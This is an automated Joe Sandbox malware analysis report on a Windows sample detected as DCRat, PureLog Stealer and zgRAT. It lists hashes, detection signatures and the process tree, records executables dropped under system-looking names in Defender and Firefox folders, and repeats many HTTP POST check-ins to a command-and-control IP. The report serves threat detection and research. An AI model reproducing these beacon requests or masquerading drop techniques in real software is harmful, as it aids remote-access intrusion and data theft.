Joe Sandbox Cloud Basic Analysis Report

Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
4Osfx7gnSx.exe

Overview

General Information

Sample name:4Osfx7gnSx.exe
renamed because original name is a hash value
Original sample name:0a0df93ba37270e35a35daaf3c1b1eab.exe
Analysis ID:1408717
MD5:0a0df93ba37270e35a35daaf3c1b1eab
SHA1:20dfdfae4e2caab0c7baf06769de0b5ab8f3bc8d
SHA256:74d236fe36375d9089df6ecc439bf91f291c89e241e1158e4752dc1dca4b1f66
Tags:DCRatexe
Infos:

Detection

DCRat, PureLog Stealer, zgRAT
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Antivirus / Scanner detection for submitted sample
Antivirus detection for dropped file
Multi AV Scanner detection for dropped file
Multi AV Scanner detection for submitted file
Snort IDS alert for network traffic
Yara detected DCRat
Yara detected PureLog Stealer
Yara detected zgRAT
.NET source code contains method to dynamically call methods (often used by packers)
Drops executable to a common third party application directory
Machine Learning detection for dropped file
Machine Learning detection for sample
Queries sensitive Plug and Play Device Information (via WMI, Win32_PnPEntity, often done to detect virtual machines)
Sigma detected: Files With System Process Name In Unsuspected Locations
Abnormal high CPU Usage
Allocates memory with a write watch (potentially for evading sandboxes)
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Drops PE files
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Internet Provider seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Tries to load missing DLLs
Uses 32bit PE files
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)

Classification

Process Tree

  • System is w10x64
  • 4Osfx7gnSx.exe (PID: 3524 cmdline: C:\Users\user\Desktop\4Osfx7gnSx.exe MD5: 0A0DF93BA37270E35A35DAAF3C1B1EAB)
    • cmd.exe (PID: 3032 cmdline: "C:\Windows\System32\cmd.exe" /C "C:\Users\user\AppData\Local\Temp\ZdeZCxRlxT.bat" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
      • conhost.exe (PID: 6488 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • chcp.com (PID: 5508 cmdline: chcp 65001 MD5: 33395C4732A49065EA72590B14B64F32)
      • w32tm.exe (PID: 4668 cmdline: w32tm /stripchart /computer:localhost /period:5 /dataonly /samples:2 MD5: 81A82132737224D324A3E8DA993E2FB5)
  • cleanup

Malware Threat Intel

Provided by

NameDescriptionAttributionBlogpost URLsLink
DCRatDCRat is a typical RAT that has been around since at least June 2019.No Attributionhttps://malpedia.caad.fkie.fraunhofer.de/details/win.dcrat
NameDescriptionAttributionBlogpost URLsLink
zgRATzgRAT is a Remote Access Trojan malware which sometimes drops other malware such as AgentTesla malware. zgRAT has an inforstealer use which targets browser information and cryptowallets.Usually spreads by USB or phishing emails with -zip/-lnk/.bat/.xlsx attachments and so on.No Attributionhttps://malpedia.caad.fkie.fraunhofer.de/details/win.zgrat

Malware Configuration

No configs have been found

Yara Signatures

Initial Sample

SourceRuleDescriptionAuthorStrings
4Osfx7gnSx.exeJoeSecurity_zgRAT_1Yara detected zgRATJoe Security
    4Osfx7gnSx.exeJoeSecurity_PureLogStealerYara detected PureLog StealerJoe Security

      Dropped Files

      SourceRuleDescriptionAuthorStrings
      C:\Recovery\izvoheVaDbpPfPMLrEwQFH.exeJoeSecurity_zgRAT_1Yara detected zgRATJoe Security
        C:\Recovery\izvoheVaDbpPfPMLrEwQFH.exeJoeSecurity_PureLogStealerYara detected PureLog StealerJoe Security
          C:\Program Files\Windows Defender Advanced Threat Protection\en-GB\dllhost.exeJoeSecurity_zgRAT_1Yara detected zgRATJoe Security
            C:\Program Files\Windows Defender Advanced Threat Protection\en-GB\dllhost.exeJoeSecurity_PureLogStealerYara detected PureLog StealerJoe Security
              C:\Program Files\Mozilla Firefox\fonts\RuntimeBroker.exeJoeSecurity_zgRAT_1Yara detected zgRATJoe Security
                Click to see the 3 entries

                Memory Dumps

                SourceRuleDescriptionAuthorStrings
                00000006.00000002.4436962371.000000000346A000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_DCRat_1Yara detected DCRatJoe Security
                  00000000.00000000.1985120867.0000000000B22000.00000002.00000001.01000000.00000003.sdmpJoeSecurity_PureLogStealerYara detected PureLog StealerJoe Security
                    00000006.00000002.4436962371.0000000003057000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_DCRat_1Yara detected DCRatJoe Security
                      00000006.00000002.4436962371.0000000002CF8000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_DCRat_1Yara detected DCRatJoe Security
                        00000000.00000002.2005023300.000000000326C000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_DCRat_1Yara detected DCRatJoe Security
                          Click to see the 2 entries

                          Unpacked PEs

                          SourceRuleDescriptionAuthorStrings
                          0.0.4Osfx7gnSx.exe.b20000.0.unpackJoeSecurity_zgRAT_1Yara detected zgRATJoe Security
                            0.0.4Osfx7gnSx.exe.b20000.0.unpackJoeSecurity_PureLogStealerYara detected PureLog StealerJoe Security

                              Sigma Signatures

                              System Summary

                              barindex
                              Sigma detected: Files With System Process Name In Unsuspected Locations
                              Source: File createdAuthor: Sander Wiebing, Tim Shelton, Nasreddine Bencherchali (Nextron Systems): Data: EventID: 11, Image: C:\Users\user\Desktop\4Osfx7gnSx.exe, ProcessId: 3524, TargetFilename: C:\Program Files\Windows Defender Advanced Threat Protection\en-GB\dllhost.exe

                              Snort Signatures

                              Timestamp:03/14/24-01:32:01.239975
                              SID:2048095
                              Source Port:49704
                              Destination Port:80
                              Protocol:TCP
                              Classtype:A Network Trojan was detected

                              Joe Sandbox Signatures

                              Click to jump to signature section

                              Show All Signature Results

                              AV Detection

                              barindex
                              Antivirus / Scanner detection for submitted sample
                              Source: 4Osfx7gnSx.exeAvira: detected
                              Antivirus detection for dropped file
                              Source: C:\Recovery\izvoheVaDbpPfPMLrEwQFH.exeAvira: detection malicious, Label: HEUR/AGEN.1323342
                              Source: C:\Program Files\Windows Defender Advanced Threat Protection\en-GB\dllhost.exeAvira: detection malicious, Label: HEUR/AGEN.1323342
                              Source: C:\Program Files (x86)\Microsoft.NET\Idle.exeAvira: detection malicious, Label: HEUR/AGEN.1323342
                              Source: C:\Program Files\Mozilla Firefox\fonts\RuntimeBroker.exeAvira: detection malicious, Label: HEUR/AGEN.1323342
                              Source: C:\Users\user\AppData\Local\Temp\ZdeZCxRlxT.batAvira: detection malicious, Label: BAT/Runner.IL
                              Multi AV Scanner detection for dropped file
                              Source: C:\Program Files (x86)\Microsoft.NET\Idle.exeReversingLabs: Detection: 68%
                              Source: C:\Program Files (x86)\Microsoft.NET\Idle.exeVirustotal: Detection: 58%Perma Link
                              Source: C:\Program Files\Mozilla Firefox\fonts\RuntimeBroker.exeReversingLabs: Detection: 68%
                              Source: C:\Program Files\Mozilla Firefox\fonts\RuntimeBroker.exeVirustotal: Detection: 58%Perma Link
                              Source: C:\Program Files\Windows Defender Advanced Threat Protection\en-GB\dllhost.exeReversingLabs: Detection: 68%
                              Source: C:\Program Files\Windows Defender Advanced Threat Protection\en-GB\dllhost.exeVirustotal: Detection: 58%Perma Link
                              Source: C:\Recovery\izvoheVaDbpPfPMLrEwQFH.exeReversingLabs: Detection: 68%
                              Source: C:\Recovery\izvoheVaDbpPfPMLrEwQFH.exeVirustotal: Detection: 58%Perma Link
                              Multi AV Scanner detection for submitted file
                              Source: 4Osfx7gnSx.exeReversingLabs: Detection: 68%
                              Source: 4Osfx7gnSx.exeVirustotal: Detection: 58%Perma Link
                              Machine Learning detection for dropped file
                              Source: C:\Recovery\izvoheVaDbpPfPMLrEwQFH.exeJoe Sandbox ML: detected
                              Source: C:\Program Files\Windows Defender Advanced Threat Protection\en-GB\dllhost.exeJoe Sandbox ML: detected
                              Source: C:\Program Files (x86)\Microsoft.NET\Idle.exeJoe Sandbox ML: detected
                              Source: C:\Program Files\Mozilla Firefox\fonts\RuntimeBroker.exeJoe Sandbox ML: detected
                              Machine Learning detection for sample
                              Source: 4Osfx7gnSx.exeJoe Sandbox ML: detected
                              Source: 4Osfx7gnSx.exeStatic PE information: EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, LARGE_ADDRESS_AWARE, 32BIT_MACHINE
                              Source: C:\Users\user\Desktop\4Osfx7gnSx.exeDirectory created: C:\Program Files\Windows Defender Advanced Threat Protection\en-GB\dllhost.exeJump to behavior
                              Source: C:\Users\user\Desktop\4Osfx7gnSx.exeDirectory created: C:\Program Files\Windows Defender Advanced Threat Protection\en-GB\5940a34987c991Jump to behavior
                              Source: C:\Users\user\Desktop\4Osfx7gnSx.exeDirectory created: C:\Program Files\Mozilla Firefox\fonts\RuntimeBroker.exeJump to behavior
                              Source: C:\Users\user\Desktop\4Osfx7gnSx.exeDirectory created: C:\Program Files\Mozilla Firefox\fonts\9e8d7a4ca61bd9Jump to behavior
                              Source: 4Osfx7gnSx.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                              Source: C:\Users\user\Desktop\4Osfx7gnSx.exeFile opened: C:\Users\user\Documents\desktop.iniJump to behavior
                              Source: C:\Users\user\Desktop\4Osfx7gnSx.exeFile opened: C:\Users\userJump to behavior
                              Source: C:\Users\user\Desktop\4Osfx7gnSx.exeFile opened: C:\Users\user\AppData\Local\TempJump to behavior
                              Source: C:\Users\user\Desktop\4Osfx7gnSx.exeFile opened: C:\Users\user\AppDataJump to behavior
                              Source: C:\Users\user\Desktop\4Osfx7gnSx.exeFile opened: C:\Users\user\AppData\LocalJump to behavior
                              Source: C:\Users\user\Desktop\4Osfx7gnSx.exeFile opened: C:\Users\user\Desktop\desktop.iniJump to behavior

                              Networking

                              barindex
                              Snort IDS alert for network traffic
                              Source: TrafficSnort IDS: 2048095 ET TROJAN [ANY.RUN] DarkCrystal Rat Check-in (POST) 192.168.2.5:49704 -> 185.104.113.237:80
                              Source: Joe Sandbox ViewASN Name: ARTNET2PL ARTNET2PL
                              Source: global trafficHTTP traffic detected: POST /Image1/LinuxHttp/_/53secure/PhpLocal/externalRequestlow6/Cdn/Multi3Auth/Vmmultiflower.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:95.0) Gecko/20100101 Firefox/95.0Host: 185.104.113.237Content-Length: 336Expect: 100-continueConnection: Keep-Alive
                              Source: global trafficHTTP traffic detected: POST /Image1/LinuxHttp/_/53secure/PhpLocal/externalRequestlow6/Cdn/Multi3Auth/Vmmultiflower.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:95.0) Gecko/20100101 Firefox/95.0Host: 185.104.113.237Content-Length: 384Expect: 100-continue
                              Source: global trafficHTTP traffic detected: POST /Image1/LinuxHttp/_/53secure/PhpLocal/externalRequestlow6/Cdn/Multi3Auth/Vmmultiflower.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:95.0) Gecko/20100101 Firefox/95.0Host: 185.104.113.237Content-Length: 1012Expect: 100-continue
                              Source: global trafficHTTP traffic detected: POST /Image1/LinuxHttp/_/53secure/PhpLocal/externalRequestlow6/Cdn/Multi3Auth/Vmmultiflower.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:95.0) Gecko/20100101 Firefox/95.0Host: 185.104.113.237Content-Length: 1276Expect: 100-continue
                              Source: global trafficHTTP traffic detected: POST /Image1/LinuxHttp/_/53secure/PhpLocal/externalRequestlow6/Cdn/Multi3Auth/Vmmultiflower.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:95.0) Gecko/20100101 Firefox/95.0Host: 185.104.113.237Content-Length: 1012Expect: 100-continue
                              Source: global trafficHTTP traffic detected: POST /Image1/LinuxHttp/_/53secure/PhpLocal/externalRequestlow6/Cdn/Multi3Auth/Vmmultiflower.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:95.0) Gecko/20100101 Firefox/95.0Host: 185.104.113.237Content-Length: 1012Expect: 100-continue
                              Source: global trafficHTTP traffic detected: POST /Image1/LinuxHttp/_/53secure/PhpLocal/externalRequestlow6/Cdn/Multi3Auth/Vmmultiflower.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:95.0) Gecko/20100101 Firefox/95.0Host: 185.104.113.237Content-Length: 1012Expect: 100-continueConnection: Keep-Alive
                              Source: global trafficHTTP traffic detected: POST /Image1/LinuxHttp/_/53secure/PhpLocal/externalRequestlow6/Cdn/Multi3Auth/Vmmultiflower.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:95.0) Gecko/20100101 Firefox/95.0Host: 185.104.113.237Content-Length: 1008Expect: 100-continueConnection: Keep-Alive
                              Source: global trafficHTTP traffic detected: POST /Image1/LinuxHttp/_/53secure/PhpLocal/externalRequestlow6/Cdn/Multi3Auth/Vmmultiflower.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:95.0) Gecko/20100101 Firefox/95.0Host: 185.104.113.237Content-Length: 1012Expect: 100-continueConnection: Keep-Alive
                              Source: global trafficHTTP traffic detected: POST /Image1/LinuxHttp/_/53secure/PhpLocal/externalRequestlow6/Cdn/Multi3Auth/Vmmultiflower.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:95.0) Gecko/20100101 Firefox/95.0Host: 185.104.113.237Content-Length: 1012Expect: 100-continueConnection: Keep-Alive
                              Source: global trafficHTTP traffic detected: POST /Image1/LinuxHttp/_/53secure/PhpLocal/externalRequestlow6/Cdn/Multi3Auth/Vmmultiflower.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:95.0) Gecko/20100101 Firefox/95.0Host: 185.104.113.237Content-Length: 1012Expect: 100-continueConnection: Keep-Alive
                              Source: global trafficHTTP traffic detected: POST /Image1/LinuxHttp/_/53secure/PhpLocal/externalRequestlow6/Cdn/Multi3Auth/Vmmultiflower.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:95.0) Gecko/20100101 Firefox/95.0Host: 185.104.113.237Content-Length: 1292Expect: 100-continueConnection: Keep-Alive
                              Source: global trafficHTTP traffic detected: POST /Image1/LinuxHttp/_/53secure/PhpLocal/externalRequestlow6/Cdn/Multi3Auth/Vmmultiflower.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:95.0) Gecko/20100101 Firefox/95.0Host: 185.104.113.237Content-Length: 1012Expect: 100-continueConnection: Keep-Alive
                              Source: global trafficHTTP traffic detected: POST /Image1/LinuxHttp/_/53secure/PhpLocal/externalRequestlow6/Cdn/Multi3Auth/Vmmultiflower.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:95.0) Gecko/20100101 Firefox/95.0Host: 185.104.113.237Content-Length: 1012Expect: 100-continue
                              Source: global trafficHTTP traffic detected: POST /Image1/LinuxHttp/_/53secure/PhpLocal/externalRequestlow6/Cdn/Multi3Auth/Vmmultiflower.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:95.0) Gecko/20100101 Firefox/95.0Host: 185.104.113.237Content-Length: 1012Expect: 100-continueConnection: Keep-Alive
                              Source: global trafficHTTP traffic detected: POST /Image1/LinuxHttp/_/53secure/PhpLocal/externalRequestlow6/Cdn/Multi3Auth/Vmmultiflower.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:95.0) Gecko/20100101 Firefox/95.0Host: 185.104.113.237Content-Length: 1012Expect: 100-continueConnection: Keep-Alive
                              Source: global trafficHTTP traffic detected: POST /Image1/LinuxHttp/_/53secure/PhpLocal/externalRequestlow6/Cdn/Multi3Auth/Vmmultiflower.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:95.0) Gecko/20100101 Firefox/95.0Host: 185.104.113.237Content-Length: 1012Expect: 100-continueConnection: Keep-Alive
                              Source: global trafficHTTP traffic detected: POST /Image1/LinuxHttp/_/53secure/PhpLocal/externalRequestlow6/Cdn/Multi3Auth/Vmmultiflower.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:95.0) Gecko/20100101 Firefox/95.0Host: 185.104.113.237Content-Length: 1012Expect: 100-continueConnection: Keep-Alive
                              Source: global trafficHTTP traffic detected: POST /Image1/LinuxHttp/_/53secure/PhpLocal/externalRequestlow6/Cdn/Multi3Auth/Vmmultiflower.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:95.0) Gecko/20100101 Firefox/95.0Host: 185.104.113.237Content-Length: 1012Expect: 100-continueConnection: Keep-Alive
                              Source: global trafficHTTP traffic detected: POST /Image1/LinuxHttp/_/53secure/PhpLocal/externalRequestlow6/Cdn/Multi3Auth/Vmmultiflower.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:95.0) Gecko/20100101 Firefox/95.0Host: 185.104.113.237Content-Length: 1292Expect: 100-continueConnection: Keep-Alive
                              Source: global trafficHTTP traffic detected: POST /Image1/LinuxHttp/_/53secure/PhpLocal/externalRequestlow6/Cdn/Multi3Auth/Vmmultiflower.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:95.0) Gecko/20100101 Firefox/95.0Host: 185.104.113.237Content-Length: 1012Expect: 100-continueConnection: Keep-Alive
                              Source: global trafficHTTP traffic detected: POST /Image1/LinuxHttp/_/53secure/PhpLocal/externalRequestlow6/Cdn/Multi3Auth/Vmmultiflower.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:95.0) Gecko/20100101 Firefox/95.0Host: 185.104.113.237Content-Length: 1012Expect: 100-continue
                              Source: global trafficHTTP traffic detected: POST /Image1/LinuxHttp/_/53secure/PhpLocal/externalRequestlow6/Cdn/Multi3Auth/Vmmultiflower.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:95.0) Gecko/20100101 Firefox/95.0Host: 185.104.113.237Content-Length: 1012Expect: 100-continueConnection: Keep-Alive
                              Source: global trafficHTTP traffic detected: POST /Image1/LinuxHttp/_/53secure/PhpLocal/externalRequestlow6/Cdn/Multi3Auth/Vmmultiflower.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:95.0) Gecko/20100101 Firefox/95.0Host: 185.104.113.237Content-Length: 1012Expect: 100-continueConnection: Keep-Alive
                              Source: global trafficHTTP traffic detected: POST /Image1/LinuxHttp/_/53secure/PhpLocal/externalRequestlow6/Cdn/Multi3Auth/Vmmultiflower.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:95.0) Gecko/20100101 Firefox/95.0Host: 185.104.113.237Content-Length: 1012Expect: 100-continueConnection: Keep-Alive
                              Source: global trafficHTTP traffic detected: POST /Image1/LinuxHttp/_/53secure/PhpLocal/externalRequestlow6/Cdn/Multi3Auth/Vmmultiflower.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:95.0) Gecko/20100101 Firefox/95.0Host: 185.104.113.237Content-Length: 1012Expect: 100-continueConnection: Keep-Alive
                              Source: global trafficHTTP traffic detected: POST /Image1/LinuxHttp/_/53secure/PhpLocal/externalRequestlow6/Cdn/Multi3Auth/Vmmultiflower.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:95.0) Gecko/20100101 Firefox/95.0Host: 185.104.113.237Content-Length: 1012Expect: 100-continueConnection: Keep-Alive
                              Source: global trafficHTTP traffic detected: POST /Image1/LinuxHttp/_/53secure/PhpLocal/externalRequestlow6/Cdn/Multi3Auth/Vmmultiflower.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:95.0) Gecko/20100101 Firefox/95.0Host: 185.104.113.237Content-Length: 1292Expect: 100-continueConnection: Keep-Alive
                              Source: global trafficHTTP traffic detected: POST /Image1/LinuxHttp/_/53secure/PhpLocal/externalRequestlow6/Cdn/Multi3Auth/Vmmultiflower.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:95.0) Gecko/20100101 Firefox/95.0Host: 185.104.113.237Content-Length: 1012Expect: 100-continueConnection: Keep-Alive
                              Source: global trafficHTTP traffic detected: POST /Image1/LinuxHttp/_/53secure/PhpLocal/externalRequestlow6/Cdn/Multi3Auth/Vmmultiflower.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:95.0) Gecko/20100101 Firefox/95.0Host: 185.104.113.237Content-Length: 1012Expect: 100-continue
                              Source: global trafficHTTP traffic detected: POST /Image1/LinuxHttp/_/53secure/PhpLocal/externalRequestlow6/Cdn/Multi3Auth/Vmmultiflower.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:95.0) Gecko/20100101 Firefox/95.0Host: 185.104.113.237Content-Length: 1012Expect: 100-continueConnection: Keep-Alive
                              Source: global trafficHTTP traffic detected: POST /Image1/LinuxHttp/_/53secure/PhpLocal/externalRequestlow6/Cdn/Multi3Auth/Vmmultiflower.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:95.0) Gecko/20100101 Firefox/95.0Host: 185.104.113.237Content-Length: 1012Expect: 100-continueConnection: Keep-Alive
                              Source: global trafficHTTP traffic detected: POST /Image1/LinuxHttp/_/53secure/PhpLocal/externalRequestlow6/Cdn/Multi3Auth/Vmmultiflower.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:95.0) Gecko/20100101 Firefox/95.0Host: 185.104.113.237Content-Length: 1012Expect: 100-continueConnection: Keep-Alive
                              Source: global trafficHTTP traffic detected: POST /Image1/LinuxHttp/_/53secure/PhpLocal/externalRequestlow6/Cdn/Multi3Auth/Vmmultiflower.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:95.0) Gecko/20100101 Firefox/95.0Host: 185.104.113.237Content-Length: 1008Expect: 100-continueConnection: Keep-Alive
                              Source: global trafficHTTP traffic detected: POST /Image1/LinuxHttp/_/53secure/PhpLocal/externalRequestlow6/Cdn/Multi3Auth/Vmmultiflower.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:95.0) Gecko/20100101 Firefox/95.0Host: 185.104.113.237Content-Length: 1012Expect: 100-continueConnection: Keep-Alive
                              Source: global trafficHTTP traffic detected: POST /Image1/LinuxHttp/_/53secure/PhpLocal/externalRequestlow6/Cdn/Multi3Auth/Vmmultiflower.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:95.0) Gecko/20100101 Firefox/95.0Host: 185.104.113.237Content-Length: 1012Expect: 100-continueConnection: Keep-Alive
                              Source: global trafficHTTP traffic detected: POST /Image1/LinuxHttp/_/53secure/PhpLocal/externalRequestlow6/Cdn/Multi3Auth/Vmmultiflower.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:95.0) Gecko/20100101 Firefox/95.0Host: 185.104.113.237Content-Length: 1012Expect: 100-continue
                              Source: global trafficHTTP traffic detected: POST /Image1/LinuxHttp/_/53secure/PhpLocal/externalRequestlow6/Cdn/Multi3Auth/Vmmultiflower.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:95.0) Gecko/20100101 Firefox/95.0Host: 185.104.113.237Content-Length: 1008Expect: 100-continueConnection: Keep-Alive
                              Source: global trafficHTTP traffic detected: POST /Image1/LinuxHttp/_/53secure/PhpLocal/externalRequestlow6/Cdn/Multi3Auth/Vmmultiflower.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:95.0) Gecko/20100101 Firefox/95.0Host: 185.104.113.237Content-Length: 1012Expect: 100-continueConnection: Keep-Alive
                              Source: global trafficHTTP traffic detected: POST /Image1/LinuxHttp/_/53secure/PhpLocal/externalRequestlow6/Cdn/Multi3Auth/Vmmultiflower.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:95.0) Gecko/20100101 Firefox/95.0Host: 185.104.113.237Content-Length: 1012Expect: 100-continueConnection: Keep-Alive
                              Source: global trafficHTTP traffic detected: POST /Image1/LinuxHttp/_/53secure/PhpLocal/externalRequestlow6/Cdn/Multi3Auth/Vmmultiflower.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:95.0) Gecko/20100101 Firefox/95.0Host: 185.104.113.237Content-Length: 1008Expect: 100-continueConnection: Keep-Alive
                              Source: global trafficHTTP traffic detected: POST /Image1/LinuxHttp/_/53secure/PhpLocal/externalRequestlow6/Cdn/Multi3Auth/Vmmultiflower.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:95.0) Gecko/20100101 Firefox/95.0Host: 185.104.113.237Content-Length: 1012Expect: 100-continueConnection: Keep-Alive
                              Source: global trafficHTTP traffic detected: POST /Image1/LinuxHttp/_/53secure/PhpLocal/externalRequestlow6/Cdn/Multi3Auth/Vmmultiflower.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:95.0) Gecko/20100101 Firefox/95.0Host: 185.104.113.237Content-Length: 1292Expect: 100-continueConnection: Keep-Alive
                              Source: global trafficHTTP traffic detected: POST /Image1/LinuxHttp/_/53secure/PhpLocal/externalRequestlow6/Cdn/Multi3Auth/Vmmultiflower.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:95.0) Gecko/20100101 Firefox/95.0Host: 185.104.113.237Content-Length: 1012Expect: 100-continueConnection: Keep-Alive
                              Source: global trafficHTTP traffic detected: POST /Image1/LinuxHttp/_/53secure/PhpLocal/externalRequestlow6/Cdn/Multi3Auth/Vmmultiflower.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:95.0) Gecko/20100101 Firefox/95.0Host: 185.104.113.237Content-Length: 1012Expect: 100-continue
                              Source: global trafficHTTP traffic detected: POST /Image1/LinuxHttp/_/53secure/PhpLocal/externalRequestlow6/Cdn/Multi3Auth/Vmmultiflower.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:95.0) Gecko/20100101 Firefox/95.0Host: 185.104.113.237Content-Length: 1012Expect: 100-continueConnection: Keep-Alive
                              Source: global trafficHTTP traffic detected: POST /Image1/LinuxHttp/_/53secure/PhpLocal/externalRequestlow6/Cdn/Multi3Auth/Vmmultiflower.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:95.0) Gecko/20100101 Firefox/95.0Host: 185.104.113.237Content-Length: 1012Expect: 100-continueConnection: Keep-Alive
                              Source: global trafficHTTP traffic detected: POST /Image1/LinuxHttp/_/53secure/PhpLocal/externalRequestlow6/Cdn/Multi3Auth/Vmmultiflower.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:95.0) Gecko/20100101 Firefox/95.0Host: 185.104.113.237Content-Length: 1012Expect: 100-continueConnection: Keep-Alive
                              Source: global trafficHTTP traffic detected: POST /Image1/LinuxHttp/_/53secure/PhpLocal/externalRequestlow6/Cdn/Multi3Auth/Vmmultiflower.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:95.0) Gecko/20100101 Firefox/95.0Host: 185.104.113.237Content-Length: 1008Expect: 100-continueConnection: Keep-Alive
